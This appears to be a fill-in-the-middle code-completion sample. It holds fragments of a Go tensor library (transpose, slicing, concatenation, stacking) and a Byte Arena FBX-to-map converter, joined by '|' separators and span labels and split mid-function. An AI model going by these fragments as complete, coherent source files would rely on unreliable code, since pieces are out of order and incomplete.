ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
}
| {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
}
return t.Concat(0, others...)
} | identifier_body |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) Concat(axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 |
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
}
return t.Concat(0, others...)
}
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
}
| {
v.reshape(v.shape[0], 1)
} | conditional_block |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices)
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func debugPolygonSVG(polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string |
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
